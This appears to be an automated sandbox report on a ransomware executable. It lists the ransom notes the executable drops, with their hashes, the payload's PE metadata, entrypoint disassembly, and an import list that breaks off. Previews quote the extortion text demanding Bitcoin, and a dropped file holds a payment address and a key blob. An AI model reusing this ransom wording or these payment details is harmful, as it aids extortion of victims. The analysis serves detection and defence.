                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkL
                  MD5:60B3A4062ABE3EA49E6EB8911977B25E
                  SHA1:E046E8388CABEAA51B3E3FF27CE6434F2A6A0562
                  SHA-256:CFF09453B6ECB0B0E2D0852C1615A4AB6074BC5AD97C38EDC31EA82A7EF58740
                  SHA-512:90F7D4F8735F24BE3FF2CE49412BE3E2497C02A3C45D1143DEF24F1B5E8A9C03F1BFAD028ACD58403725BFB98113B65C43E5EDDCF4681F0F8B3656924579CEF5
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\Users\Public\Music\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):609768
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCc
                  MD5:E8D2A8D45AE6681B32BED0C71800A1EA
                  SHA1:AB33C23D6A69B473CA0E6A40D194BA7AE5ACB066
                  SHA-256:CCF4C9E7968DA09FABC49BCDBAB494296C5AE1508FD69DF675C1C880D2BE8FFD
                  SHA-512:FF5109BDF2D8C4C755687F560BADBED3DEF165EDFB8B9C43C9DAB6059756C1D9FDC2C5405BBC759E14BAF1B76C5E5ABE2203CF48973F9AFB9849B20FA996FBA9
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\Users\Public\Music\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):18873
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5u
                  MD5:ADC60E08450FC05F8E5AAAA3EB29750B
                  SHA1:3C6E978C14B69A4B4BCFA3D3996FB9A212AF25EC
                  SHA-256:A4C281C75F49278501AC118F0F51A6A296FFEEB9492DFD5B7572505734000BA0
                  SHA-512:ED9BC8B77C3A7345E13B1043C18A9287F6ABFCFD730ADA5EF0624DA8DFFC51C6BACD1709D5F7257959E6B754A0F8700A537D00DE5FEB1B76CDAACF6535A384F9
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\Users\Public\Pictures\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\Users\Public\Pictures\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\Users\Public\Pictures\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\Users\Public\Videos\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\Users\Public\Videos\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):609768
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCc
                  MD5:E8D2A8D45AE6681B32BED0C71800A1EA
                  SHA1:AB33C23D6A69B473CA0E6A40D194BA7AE5ACB066
                  SHA-256:CCF4C9E7968DA09FABC49BCDBAB494296C5AE1508FD69DF675C1C880D2BE8FFD
                  SHA-512:FF5109BDF2D8C4C755687F560BADBED3DEF165EDFB8B9C43C9DAB6059756C1D9FDC2C5405BBC759E14BAF1B76C5E5ABE2203CF48973F9AFB9849B20FA996FBA9
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\Users\Public\Videos\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):18873
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5u
                  MD5:ADC60E08450FC05F8E5AAAA3EB29750B
                  SHA1:3C6E978C14B69A4B4BCFA3D3996FB9A212AF25EC
                  SHA-256:A4C281C75F49278501AC118F0F51A6A296FFEEB9492DFD5B7572505734000BA0
                  SHA-512:ED9BC8B77C3A7345E13B1043C18A9287F6ABFCFD730ADA5EF0624DA8DFFC51C6BACD1709D5F7257959E6B754A0F8700A537D00DE5FEB1B76CDAACF6535A384F9
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\Users\user\AppData\Roaming\mllvvvh.exe
                  Process:C:\Users\user\Desktop\safecrypt.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):495616
                  Entropy (8bit):7.100833923038912
                  Encrypted:false
                  SSDEEP:12288:UH2tiySKXkTDj0jxwn8mHiCA092tiySKXkTDj0jxwnvSxU/:7AKXeDj0jkDA0QAKXeDj0jD
                  MD5:4A1D88603B1007825A9C6B36D1E5DE44
                  SHA1:78A6E76AB32039576B52153B56F2E8BD035222C3
                  SHA-256:7004AF389D633B82C3EE67055ECB0F9ACCAE5DC0A53721DA66C76825ECE528F8
                  SHA-512:1585048BB9B465CB372B8369F5AA1472ED1252E642DB332DCBBC0F2C1582DA47459CC14A461EEE4BFE178DEEB3CF5D07E719CAE21E78B8DAC7FB28347A50F9D8
                  Malicious:true
                  Antivirus:
                  • Antivirus: Metadefender, Detection: 74%, Browse
                  • Antivirus: ReversingLabs, Detection: 96%
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................6...?......T......T..................T......{......Rich............................PE..L....p.D......................C.....F........ ....@.......................... G........Q..............................................F.8$........................................................................... ...............................text............................... ..`.rdata....... ... ... ..............@..@.data....?..@... ...@..............@....rsrc...8$....F..0...`..............@..@................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\Documents\recover_file_uccnnnwww.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):254
                  Entropy (8bit):4.542327134219705
                  Encrypted:false
                  SSDEEP:6:7tYdQOA0VD50v1V9iYgvz3hepaLmzRLmB8Hn7WQj3FKcQ0is:OdyiDYgjhSaLe28HdHCs
                  MD5:ED9A2602D6F32E1461626A6008C48DC6
                  SHA1:28DD184EFAEE68C02A74A257A20C08010CCB534E
                  SHA-256:A43EC3F1655D0CA9A57CA4497CB9421E7658E85AA6422641B41EDC859874CC7A
                  SHA-512:DE8B4DDAE3D63F8F3208C1A4C93786528FED1F43ADE81E20593A6F36FF237F2FE164CC160961D1A751096C56AD4612AF4F3FC0A8F880E819E3B1274429823E8D
                  Malicious:false
                  Preview: 17jHt1XfGUCndM4rug2Xfxx7SZ4naS1xNV..04C5D06B5583E0FDA056ED8ECF86AEC81F048A0D98B0D886F35E524A7467567AC8337F3B7EF2F81C1F1EED679487F8BD6FB4F78D8C8E426D8A409EF35C7335F06915B4AB60F0E04EE44B3C09B49133EC8D7AE35FF8D60B151E595C850693C13F02..BC32439525276233..20..

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.100833923038912
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:safecrypt.exe
                  File size:495616
                  MD5:4a1d88603b1007825a9c6b36d1e5de44
                  SHA1:78a6e76ab32039576b52153b56f2e8bd035222c3
                  SHA256:7004af389d633b82c3ee67055ecb0f9accae5dc0a53721da66c76825ece528f8
                  SHA512:1585048bb9b465cb372b8369f5aa1472ed1252e642db332dcbbc0f2c1582da47459cc14a461eee4bfe178deeb3cf5d07e719cae21e78b8dac7fb28347a50f9d8
                  SSDEEP:12288:UH2tiySKXkTDj0jxwn8mHiCA092tiySKXkTDj0jxwnvSxU/:7AKXeDj0jkDA0QAKXeDj0jD
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................6...?.......T.......T.......................T.......{.......Rich............................PE..L....p.D...

                  File Icon

                  Icon Hash:00828e8e8686b000

                  Static PE Info

                  General

                  Entrypoint:0x441a46
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                  DLL Characteristics:
                  Time Stamp:0x448970C3 [Fri Jun 9 12:59:47 2006 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:8a09dfd04bde6e880e98701ff3654ab6

                  Entrypoint Preview

                  Instruction
                  push ebp
                  mov ebp, esp
                  push FFFFFFFFh
                  push 00470E58h
                  push 00441BCCh
                  mov eax, dword ptr fs:[00000000h]
                  push eax
                  mov dword ptr fs:[00000000h], esp
                  sub esp, 68h
                  push ebx
                  push esi
                  push edi
                  mov dword ptr [ebp-18h], esp
                  xor ebx, ebx
                  mov dword ptr [ebp-04h], ebx
                  push 00000002h
                  call dword ptr [0044241Ch]
                  pop ecx
                  or dword ptr [0086EFBCh], FFFFFFFFh
                  or dword ptr [0086EFC0h], FFFFFFFFh
                  call dword ptr [00442420h]
                  mov ecx, dword ptr [0086EFA8h]
                  mov dword ptr [eax], ecx
                  call dword ptr [00442424h]
                  mov ecx, dword ptr [0086EFA4h]
                  mov dword ptr [eax], ecx
                  mov eax, dword ptr [00442428h]
                  mov eax, dword ptr [eax]
                  mov dword ptr [0086EFB8h], eax
                  call 00007F3A5CA6916Bh
                  cmp dword ptr [00475EB0h], ebx
                  jne 00007F3A5CA6905Eh
                  push 00441BC8h
                  call dword ptr [0044242Ch]
                  pop ecx
                  call 00007F3A5CA6913Dh
                  push 00474014h
                  push 00474010h
                  call 00007F3A5CA69128h
                  mov eax, dword ptr [0086EFA0h]
                  mov dword ptr [ebp-6Ch], eax
                  lea eax, dword ptr [ebp-6Ch]
                  push eax
                  push dword ptr [0086EF9Ch]
                  lea eax, dword ptr [ebp-64h]
                  push eax
                  lea eax, dword ptr [ebp-70h]
                  push eax
                  lea eax, dword ptr [ebp-60h]
                  push eax
                  call dword ptr [00442434h]
                  push 0047400Ch
                  push 00474000h
                  call 00007F3A5CA690F5h

                  Rich Headers

                  Programming Language:
                  • [ C ] VS98 (6.0) build 8168
                  • [EXP] VC++ 6.0 SP5 build 8804
                  • [C++] VS98 (6.0) build 8168
                  • [LNK] VS98 (6.0) imp/exp build 8168

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x70ee00xa0.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x46f0000x2438.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x420000x980.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x40ed40x41000False0.830187049279data7.12605118752IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .rdata0x420000x31d000x32000False0.85203125data7.05842859557IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0x740000x3fafc40x2000unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .rsrc0x46f0000x24380x3000False0.43212890625data4.23190923618IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountry
                  RT_ICON0x46f4200x73dBase IV DBT of @.DBF, block length 512, next free block index 40
                  RT_ICON0x46f7080x1e7GLS_BINARY_LSB_FIRST
                  RT_ICON0x46f8580x18aGLS_BINARY_LSB_FIRST
                  RT_ICON0x46f9800x43edBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 50331872, next used block 3544003539
                  RT_ICON0x4706f80x2cdGLS_BINARY_LSB_FIRST
                  RT_ICON0x4707f80x163data
                  RT_DIALOG0x4701600x395data
                  RT_DIALOG0x4702980x3aedata
                  RT_DIALOG0x4704c00x33cdata
                  RT_DIALOG0x4705b80x21fdata
                  RT_DIALOG0x46fc900x374data
                  RT_CURSOR0x4706d80x1efdata
                  RT_CURSOR0x4706c00x412data
                  RT_CURSOR0x4706c80x2c0data
                  RT_GROUP_ICON0x46f8300x338data
                  RT_GROUP_ICON0x4707e00x181data
                  RT_GROUP_ICON0x4714200x22edata
                  RT_GROUP_ICON0x46fc680x3dcdata
                  RT_VERSION0x46fd900x3d0data

                  Imports

                  DLLImport
                  MSVCRT.dll_controlfp, _wexecv, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, ldiv, _XcptFilter, floor, _onexit, __dllonexit, _flushall, _setmbcp, __CxxFrameHandler
                  GDI32.dllGetTextColor, CreateFontW, SetViewportOrgEx, GetCharWidthW, GetDIBColorTable, EnumFontsW, CreateDCA, SetMetaRgn, RealizePalette, EnumFontFamiliesA, DeleteObject, GetCharABCWidthsA, CreateCompatibleBitmap, SetBkColor, RectVisible, StartDocW, SetGraphicsMode, GetWinMetaFileBits, SetBkMode, CreatePolyPolygonRgn, EnumEnhMetaFile, CreateMetaFileA, ExtFloodFill, Chord, GetCurrentObject, GetGlyphOutlineW, ExtTextOutW, MoveToEx, SetMapperFlags, GetWorldTransform, CreatePen, SetPolyFillMode, GetCharABCWidthsFloatW, GetEnhMetaFileW, CreateMetaFileW, GetSystemPaletteEntries, RemoveFontResourceA, PlayEnhMetaFileRecord, SetArcDirection, SetROP2, Ellipse, GetClipBox, GetFontData, CreateRectRgn, GetEnhMetaFileDescriptionW, CreateDIBSection, Rectangle, StrokeAndFillPath, Polyline, GdiFlush, GetNearestPaletteIndex, GetTextCharsetInfo, EqualRgn, SetStretchBltMode, PolyBezier, CreateRoundRectRgn, RectInRegion, PlayMetaFile, SetDIBColorTable, GetDCOrgEx, OffsetRgn, GetCharWidthA, GetDeviceCaps, GetTextExtentPoint32A, AbortPath, CopyEnhMetaFileW, StretchBlt, LPtoDP, CopyEnhMetaFileA, CreateICA, GetMetaFileBitsEx, SetDeviceGammaRamp, GetWindowExtEx, GetClipRgn, SetViewportExtEx, FrameRgn, SetRectRgn, CreateICW, GetPixel, CreateDiscardableBitmap, GetTextExtentPointA, Polygon, CreateFontA, DeleteDC, SaveDC, GetEnhMetaFilePaletteEntries, GetGlyphOutlineA, GetMapMode, GetPolyFillMode, CloseEnhMetaFile, GetPath, GetObjectW, EnumICMProfilesA, GetStockObject, DrawEscape, TextOutA, ScaleViewportExtEx, CreatePolygonRgn, SetPixelV, GetObjectA, EnumFontFamiliesExW, SelectObject, Arc, RoundRect, PlayEnhMetaFile, ExtCreateRegion, PolyPolygon, CreateDCW, GetROP2, GetPixelFormat, ExtEscape, PolyDraw, GetKerningPairsA, OffsetWindowOrgEx, GetOutlineTextMetricsA, RestoreDC, FillRgn, CreateHalftonePalette, GetRegionData, SetMetaFileBitsEx, CreateRectRgnIndirect, GetOutlineTextMetricsW, SetWindowOrgEx, EndPath, ExtTextOutA, ResizePalette, CancelDC, OffsetClipRgn, AnimatePalette, GetEnhMetaFileHeader, GetCharacterPlacementW, PtVisible
                  USER32.dllGetMenuItemCount, CharNextA, GrayStringW, SwapMouseButton, DragDetect, EndPaint, GetTabbedTextExtentA, SendDlgItemMessageW, GetLastActivePopup, SetCapture, SetClassLongW, LoadMenuA, SetMenuDefaultItem, DrawFocusRect, CreateMDIWindowW, GetClassInfoA, FreeDDElParam, PostQuitMessage, SetScrollRange, GetDlgItemTextA, SetWindowTextA, KillTimer, GetWindowTextLengthA, GetParent, GetMenuItemRect, CreateMDIWindowA, LoadCursorA, SendInput, CopyAcceleratorTableW, ChildWindowFromPointEx, CreateDesktopW, SetActiveWindow, GetUpdateRgn, DialogBoxParamA, SetFocus, SetCaretPos, SetCursor, SetWindowPlacement, ExitWindowsEx, OpenClipboard, MessageBeep, ChangeDisplaySettingsW, GetScrollRange, GetClassLongW, SetWindowTextW, GetMenuItemInfoW, GetClassInfoW, GetUserObjectSecurity, CharToOemA, FrameRect, FindWindowExA, mouse_event, EnumChildWindows, PackDDElParam, CharPrevW, AttachThreadInput, SetClipboardData, GetDoubleClickTime, GetWindowLongA, GetDlgItemTextW, GetSystemMetrics, CloseWindow, CharToOemBuffW, CheckMenuItem, UnregisterClassW, TranslateAcceleratorA, MapVirtualKeyA, CreateMenu, GetMenuItemID, CreateDialogParamA, DrawStateA, GetWindowWord, VkKeyScanW, SendMessageCallbackA, GetClassLongA, DefFrameProcW, WindowFromDC, DrawTextExA, SetWindowLongA, GetGUIThreadInfo, SetMenuItemInfoW, ClipCursor, IsCharAlphaW, SetKeyboardState, InsertMenuW, GetWindowTextA, GetMenuContextHelpId, ReleaseDC, ShowOwnedPopups, RegisterClassExA, SendMessageW, IsCharAlphaA, EnumThreadWindows, GetDC, ScrollDC, CloseClipboard, WinHelpW, PeekMessageW, GetWindowTextW, LoadBitmapW, LoadMenuIndirectW, RemovePropA, MessageBoxIndirectA, CreatePopupMenu, TranslateMessage, SetUserObjectInformationW, ShowWindow, GetScrollInfo, CharLowerBuffW, PostThreadMessageW, SetRect, LoadMenuW, InvalidateRect, SetWinEventHook, LoadKeyboardLayoutA, EndDialog, EnableScrollBar, InvalidateRgn, GetTabbedTextExtentW, AppendMenuA, LoadCursorW, GetMessageExtraInfo, FindWindowW, EnableWindow, GetKeyboardState, CreateWindowExW, GetWindowRect, CharNextExA, CharNextW, SendDlgItemMessageA, GetClassInfoExW, IntersectRect, DrawIconEx, ModifyMenuA, GetProcessWindowStation, EnableMenuItem, GetDlgItem, GetNextDlgGroupItem, DdeQueryConvInfo, ClientToScreen, OemToCharBuffW, SetScrollInfo, GetScrollPos, IsDialogMessageA, MessageBoxA, GetKeyNameTextW, AppendMenuW, wvsprintfA, DrawAnimatedRects, DefWindowProcA, SetMenu, GetForegroundWindow, LoadMenuIndirectA, GetDlgItemInt, LoadCursorFromFileW, NotifyWinEvent, UnhookWindowsHook, BeginPaint, UpdateWindow, CallMsgFilterA, MoveWindow, GetClipboardViewer, DialogBoxIndirectParamA, MapVirtualKeyExW, CloseDesktop, GrayStringA, EnumDesktopsW, CreateIconFromResource, SendNotifyMessageW, ToAsciiEx, CharUpperBuffW, IsMenu, SendMessageA, SetMenuContextHelpId, RemoveMenu, EnumWindows, 